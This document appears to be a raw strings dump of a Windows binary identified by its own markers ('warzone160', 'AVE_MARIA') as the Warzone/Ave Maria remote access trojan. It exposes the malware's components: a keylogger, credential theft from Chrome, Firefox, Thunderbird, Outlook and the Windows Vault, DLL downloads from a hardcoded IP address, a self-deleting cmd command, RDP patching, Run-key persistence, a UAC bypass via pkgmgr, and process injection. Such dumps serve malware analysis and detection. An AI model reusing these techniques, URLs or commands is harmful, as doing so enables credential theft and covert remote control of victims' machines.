!This program cannot be run in DOS mode.
\:lq1:J
\:lq2:H
\:RichK
`.rdata
@.data
@.reloc
9^4tah
93tfVVVV
?vOj@_+
SVWj@R
PWWWWQ
P;~,s&W
D$H.{@
WWWWWW
PVShH0A
SSSSSS
PVVVVV
tYh|.A
PVh@aA
*WWWWWWWj
G$;C,u;
Sh }A
t+h$}A
u3Sh }A
PSSSSSSh
f93trS
tG;HtsB
f99t,+
QQSVWQ
TSVjD3
RSSSSSSQ
w(9s t
9_Pt=Sh
j(h,EA
PWVWWWSh
QQSVWj
SSSShdEA
QQVPQQ
WRh$FA
9\$8t;
127.0.0.2
abcdefghijklmnopqrstuvwxyzABCDEFGHIJK...
warzone160
USER32.DLL
MessageBoxA
Assert
An assertion condition failed
PureCall
A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application
GetRawInputData
ToUnicode
MapVirtualKeyA
SELECT * FROM logins
NSS_Init
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
NSSBase64_DecodeBuffer
PK11_CheckUserPassword
NSS_Shutdown
PK11_FreeSlot
PR_GetError
vaultcli.dll
VaultOpenVault
VaultCloseVault
VaultEnumerateItems
VaultGetItem
VaultFree
encryptedUsername
hostname
encryptedPassword
sqlite3_open
sqlite3_close
sqlite3_prepare_v2
sqlite3_column_text
sqlite3_step
sqlite3_exec
sqlite3_open_v2
sqlite3_column_blob
sqlite3_column_type
sqlite3_column_bytes
sqlite3_close_v2
sqlite3_finalize
Storage
Accounts\Account.rec0
software\Aerofox\FoxmailPreview
Executable
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
%u.%u.%u.%u
AVE_MARIA
UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
ntdll.dll
RtlGetVersion
LdrLoadDll
RtlCreateUnicodeStringFromAsciiz
LdrGetProcedureAddress
RtlInitAnsiString
IsWow64Process
kernel32
VirtualQuery
cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
\System32\cmd.exe
explorer.exe
find.exe
find.db
-w %ws -d C -f %s
Software\Microsoft\Windows\CurrentVersion\Internet Settings
MaxConnectionsPer1_0Server
MaxConnectionsPerServer
?lst@@YAXHJ@Z
.text$di
.text$mn
.text$yd
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.CRT$XCA
.CRT$XCU
.CRT$XCZ
.rsrc$01
.rsrc$02
CreateDirectoryW
GetModuleFileNameA
SetLastError
GetLastError
lstrcatW
CloseHandle
lstrlenW
ExpandEnvironmentStringsW
lstrlenA
lstrcmpA
lstrcatA
MultiByteToWideChar
lstrcpyA
WideCharToMultiByte
lstrcpyW
GetTickCount
lstrcmpW
GetModuleHandleA
HeapAlloc
GetProcessHeap
LoadLibraryA
GetProcAddress
ExitProcess
GetCommandLineA
GetStartupInfoA
HeapFree
VirtualFree
VirtualAlloc
HeapReAlloc
VirtualQuery
TerminateThread
CreateThread
WriteFile
CreateFileW
LoadLibraryW
GetLocalTime
GetCurrentThreadId
GetCurrentProcessId
ReadFile
FindFirstFileA
GetBinaryTypeW
FindNextFileA
GetFullPathNameA
GetTempPathW
GetPrivateProfileStringW
CreateFileA
GlobalAlloc
GetCurrentDirectoryW
SetCurrentDirectoryW
LocalFree
GetFileSize
FreeLibrary
WaitForSingleObject
GetCurrentProcess
WaitForMultipleObjects
CreatePipe
PeekNamedPipe
DuplicateHandle
SetEvent
CreateProcessW
CreateEventA
GetModuleFileNameW
LoadResource
FindResourceW
GetComputerNameW
LoadLibraryExW
FindFirstFileW
FindNextFileW
SetFilePointer
GetLogicalDriveStringsW
DeleteFileW
CopyFileW
GetDriveTypeW
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSection
DeleteCriticalSection
CreateMutexA
ReleaseMutex
TerminateProcess
OpenProcess
CreateToolhelp32Snapshot
Process32NextW
Process32FirstW
VirtualProtectEx
CreateProcessA
SizeofResource
VirtualProtect
LockResource
GetWindowsDirectoryW
Process32First
WriteProcessMemory
Process32Next
GetWindowsDirectoryA
VirtualAllocEx
CreateRemoteThread
IsWow64Process
GetTempPathA
KERNEL32.dll
wsprintfW
wsprintfA
GetLastInputInfo
GetWindowTextW
PostQuitMessage
GetKeyNameTextW
ToUnicode
TranslateMessage
RegisterRawInputDevices
DefWindowProcA
GetForegroundWindow
MapVirtualKeyA
GetRawInputData
RegisterClassW
SetWindowsHookExA
GetAsyncKeyState
CallNextHookEx
CreateWindowExW
DispatchMessageA
GetMessageA
GetKeyState
MessageBoxA
USER32.dll
RegQueryValueExW
RegOpenKeyExW
RegOpenKeyExA
RegEnumKeyExW
RegQueryValueExA
RegQueryInfoKeyW
RegCloseKey
OpenServiceW
ChangeServiceConfigW
QueryServiceConfigW
EnumServicesStatusExW
StartServiceW
RegSetValueExW
RegCreateKeyExA
OpenSCManagerW
CloseServiceHandle
GetTokenInformation
LookupAccountSidW
FreeSid
OpenProcessToken
AllocateAndInitializeSid
AdjustTokenPrivileges
LookupPrivilegeValueW
RegDeleteValueW
RegSetValueExA
RegCreateKeyExW
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteW
SHGetFolderPathW
SHCreateDirectoryExW
SHGetSpecialFolderPathW
ShellExecuteExA
SHELL32.dll
URLDownloadToFileW
urlmon.dll
freeaddrinfo
getaddrinfo
WS2_32.dll
CoUninitialize
CoInitialize
CoCreateInstance
CoTaskMemFree
ole32.dll
PathFindExtensionW
PathFindFileNameW
PathCombineA
StrStrA
PathRemoveFileSpecA
StrStrW
PathFileExistsW
SHLWAPI.dll
NetLocalGroupAddMembers
NetUserAdd
NETAPI32.dll
OLEAUT32.dll
CryptStringToBinaryA
CryptUnprotectData
CRYPT32.dll
GetModuleFileNameExW
PSAPI.DLL
InternetCheckConnectionW
InternetQueryDataAvailable
InternetOpenUrlW
InternetOpenW
InternetCloseHandle
InternetReadFile
WININET.dll
PPPPPPPS
PPPPPPPS
PPPPPPPS
!This program cannot be run in DOS mode.
`.rdata
@.data
u*hh;@
VWh@"@
RtlGetCurrentPeb
RtlEnterCriticalSection
RtlLeaveCriticalSection
RtlInitUnicodeString
RtlFillMemory
NtAllocateVirtualMemory
LdrEnumerateLoadedModules
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
<servicing>
<package action="install">
<assemblyIdentity name="Package_1_for_KB929761" version="6.0.1.1" language="neutral" processorArchitecture="x86" publicKeyToken="31bf3856ad364e35"/>
<source location="%configsetroot%\Windows6.0-KB929761-x86.CAB" />
</package>
</servicing>
</unattend>
.text$mn
.idata$5
.00cfg
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
SizeofResource
WriteFile
GetModuleFileNameW
GetTempPathW
WaitForSingleObject
CreateFileW
GetSystemDirectoryW
lstrcatW
LockResource
CloseHandle
LoadLibraryW
LoadResource
FindResourceW
GetWindowsDirectoryW
GetProcAddress
ExitProcess
KERNEL32.dll
MessageBoxW
USER32.dll
SHCreateItemFromParsingName
ShellExecuteExW
SHELL32.dll
CoInitialize
CoUninitialize
CoCreateInstance
CoGetObject
ole32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
!This program cannot be run in DOS mode.
/Rich3
`.rdata
@.data
.reloc
.text$mn
.idata$5
.00cfg
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
GetStartupInfoW
ExpandEnvironmentStringsW
TerminateProcess
OpenProcess
CreateToolhelp32Snapshot
Process32NextW
Process32FirstW
CloseHandle
ExitProcess
CreateProcessW
lstrcmpW
KERNEL32.dll
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
PathFindFileNameW
SHLWAPI.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
IsProcessorFeaturePresent
1)1E1U1[1n1
2(212<2C2c2i2o2u2{2
3.373F3
X0`0d0,181
0o1u1|1
2"2(2/262=2D2N2n2
;&;1;<;G;R;];h;
<!<@<Y<
000N0U0-1A1V1u1
6!616|6
7'7A7K7W7^7j7q7}7
8]8k8|8
9!91989D9K9W9^9
9S:Z:a:j:
;J;Q;X;a;
;/<A<N<
>3>P>m>
/080X0
2 303<3f3
7"7'737A7
7%8+828<8L8S8o8
989?9I9P9Z9a9
3 4&454A4R4k4q4{4
5+505:5D5N5X5b5l5v5
5>6H6R6t6~6
7d7n7x7
7$8)8.888=8B8O8T8Y8f8k8p8}8
9!9%9)9-9195999=9A9E9_9
:8:Z:_:{:
<3<[<m<
<%=E=J=e=k=q=
>$><>M>W>`>
1 1%1+131;1F1K1o1
2,2G2w2~2
3 3=3H3u3
4)4?4J4V4[4b4l4r4{4
5!5'5.5;5@5L5Q5^5c5
5%62696F6v6}6K8
929:9@9K9i9
;";2;B;R;b;r;
;1<D<T<a<q<~<
=.=;=O=
=0>5>|>
0f0m0u0
222K2d2}2
4#464I4e4
6)696I6Y6d6w6
9*9C9\9u9
;);<;O;b;u;
< <.<G<[<d<m<:=
> >1>C>
1-12171A1U1Z1_1m1u1|1
4/454:4E4J4U4Z4d4z4
5/595F5M5S5X5
6-6;6U6^6s6
7&7G7R7e7
<)<3<A<
2'3Q3]3e3o3u3
4 4&42474=4Q4\4h4m4t4
6>6I6[6d6m6s6
7>7S7Y7e7m7w7}7
7&8;8W8d8p8
:8;F;];|;
< <)</<4<e<
>.>4>]>d>r>
0$151C1i1|1
242D2M2T2
2 3E3O3]3
4=4]4q4}4
587?7]7r7
9<:~: ;
=k=s={=
7+70787?7
8W8p8{8
9J9n9u9
9%:H:{:
=">@>^>
0=1F1T1o1
2+20272D2M2V2l2~2
4:4X4`4{4
5F5]5d5
6<6C6g6u6|6
7,7?7^7h7
; ;%;);L;R;W;k;w;
=6=R=s=
050A0I0U0l0
414:4C4I4^4
6"7-777A7K7v7
899M9@:l:
;g;l;z;
;+<2<k<p<}<
>%>/>9>
?4?>?M?S?b?}?
0(060;0@0E0J0
1&1:1T1[1k1r1
1b2n2u2{2
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6`6d6h6l6p6
0 0$0(0x5
\Microsoft Vision\
User32.dll
ExplorerIdentifier
%02d-%02d-%02d_%02d.%02d.%02d
Unknow
{Unknown}
[ENTER]
[BKSP]
[CTRL]
[CAPS]
[INSERT]
\Google\Chrome\User Data\Default\Login Data
Software\Microsoft\Windows\CurrentVersion\App Paths\
http://www.google.com
http://5.206.225.104/dll/softokn3.dll
http://5.206.225.104/dll/msvcp140.dll
http://5.206.225.104/dll/mozglue.dll
http://5.206.225.104/dll/vcruntime140.dll
http://5.206.225.104/dll/freebl3.dll
http://5.206.225.104/dll/nss3.dll
softokn3.dll
msvcp140.dll
mozglue.dll
vcruntime140.dll
freebl3.dll
nss3.dll
msvcr120.dll
msvcp120.dll
Internet Explorer
Profile
firefox.exe
\firefox.exe
\Mozilla\Firefox\
profiles.ini
\logins.json
thunderbird.exe
\Thunderbird\
Could not decrypt
Account Name
POP3 Server
POP3 User
SMTP Server
POP3 Password
SMTP Password
HTTP Password
IMAP Password
Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
TermService
%ProgramFiles%
%ProgramW6432%
\Microsoft DN1
\rdpwrap.ini
\sqlmap.dll
SeDebugPrivilege
SYSTEM\CurrentControlSet\Services\TermService\Parameters
ServiceDll
SYSTEM\CurrentControlSet\Services\TermService
ImagePath
svchost.exe
svchost.exe -k
CertPropSvc
SessionEnv
ServicesActive
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns
SYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip Redirector
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC
fDenyTSConnections
EnableConcurrentSessions
AllowMultipleTSSessions
RDPClip
@\cmd.exe
SOFTWARE\Microsoft\Cryptography
MachineGuid
ntdll.dll
C:\Users\louis\Documents\workspace\MortyCrypter\MsgBox.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\
InitWindows
Software\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\_rptls
Install
\System32\cmd.exe
WM_DSP
Mozilla/32.0 (compatible)
@Description
FriendlyName
Source
Grabber
AWM_FIND
Asend.db
WM_DSP
ntdll.dll
Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
explorer.exe
\explorer.exe
WM_DISP
dismcore.dll
ellocnak.xml
\pkgmgr.exe
/n:%temp%\ellocnak.xml
Hey I'm Admin
WM_DISP
SOFTWARE\_rptls
Install
%systemroot%\system32\